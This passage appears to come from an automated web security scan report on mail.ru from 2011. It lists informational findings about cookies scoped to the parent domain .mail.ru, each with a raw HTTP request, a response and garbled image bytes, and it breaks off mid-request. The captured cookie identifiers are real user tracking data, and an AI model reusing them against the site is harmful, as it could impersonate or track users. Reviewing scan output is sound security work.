Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/gif
Content-Length: 135
Connection: keep-alive
Set-Cookie: p=6usGAErxkwAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a................;.;............!.......,..........L(...%.X.......\$..hv...B@z........A....H.t.)...-P.d*6..@e2....J.RN...B...ht..;

15.51. http://r2.mail.ru/b12527647.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12527647.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=A+wGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12527647.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/gif
Content-Length: 131
Connection: keep-alive
Set-Cookie: p=A+wGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a........P.....D................!.......,..........H....$.H.$B..k..UQ...\.(....9|sfF...7..0J.d..!..Q.09b&.0$......G.R...x.H..;

15.52. http://r2.mail.ru/b12529050.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12529050.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=eucGAEvDVAAA; expires=Wed, 24-Apr-13 14:21:27 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12529050.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:27 GMT
Content-Type: image/jpeg
Content-Length: 3351
Connection: keep-alive
Set-Cookie: p=eucGAEvDVAAA; expires=Wed, 24-Apr-13 14:21:27 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:27 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C....... .. ..........................................................<.<.................................
...[SNIP]...

15.53. http://r2.mail.ru/b12530142.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12530142.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=qBoHAE3xEgAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12530142.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 2303
Connection: keep-alive
Set-Cookie: p=qBoHAE3xEgAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C....... .. ..........................................................<.<.."..............................
...[SNIP]...

15.54. http://r2.mail.ru/b12530159.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12530159.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=qPsGAFqt5gAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12530159.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 2119
Connection: keep-alive
Set-Cookie: p=qPsGAFqt5gAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C......................
.....
...
.................................C....... .. ..........................................................<.<.."..............................
...[SNIP]...

15.55. http://r2.mail.ru/b12531249.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12531249.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=vOoGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12531249.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 1807
Connection: keep-alive
Set-Cookie: p=vOoGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C....... .. ..........................................................<.<.."..............................
...[SNIP]...

15.56. http://r2.mail.ru/b12531545.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12531545.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=NdYGAE3BGQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12531545.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 1374
Connection: keep-alive
Set-Cookie: p=NdYGAE3BGQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....,.,.....C......................
.....
...
.................................C....... .. ..........................................................<.<..!..............................
...[SNIP]...

15.57. http://r2.mail.ru/b12531624.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12531624.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=Z+kGAFnN4QAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12531624.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 1811
Connection: keep-alive
Set-Cookie: p=Z+kGAFnN4QAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C....... .. ..........................................................<.<..!..............................
...[SNIP]...

15.58. http://r2.mail.ru/b12532203.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12532203.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=ueEGAEipQQAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12532203.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 2157
Connection: keep-alive
Set-Cookie: p=ueEGAEipQQAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C....... .. ..........................................................<.<.."..............................
...[SNIP]...

15.59. http://r2.mail.ru/b12752186.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12752186.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=iBoHAE3xEgAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752186.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 1841
Connection: keep-alive
Set-Cookie: p=iBoHAE3xEgAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C......................... ....................!........."$".$.......C..............................................
...[SNIP]...

15.60. http://r2.mail.ru/b12752583.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12752583.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=NOkGAFnN4QAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752583.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 1772
Connection: keep-alive
Set-Cookie: p=NOkGAFnN4QAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
....................................<.<..................................
.....................}........!1A..Qa."q.2....#B...R..$3br.
.....
...[SNIP]...

15.61. http://r2.mail.ru/b12752584.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12752584.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=K/QGAEvncgAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752584.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 5872
Connection: keep-alive
Set-Cookie: p=K/QGAEvncgAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................<.<..
...[SNIP]...

15.62. http://r2.mail.ru/b12752585.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12752585.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=79sGAErbVQAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752585.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 5320
Connection: keep-alive
Set-Cookie: p=79sGAErbVQAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................<.<..
...[SNIP]...

15.63. http://r2.mail.ru/b12752586.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12752586.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=z+8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752586.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encodin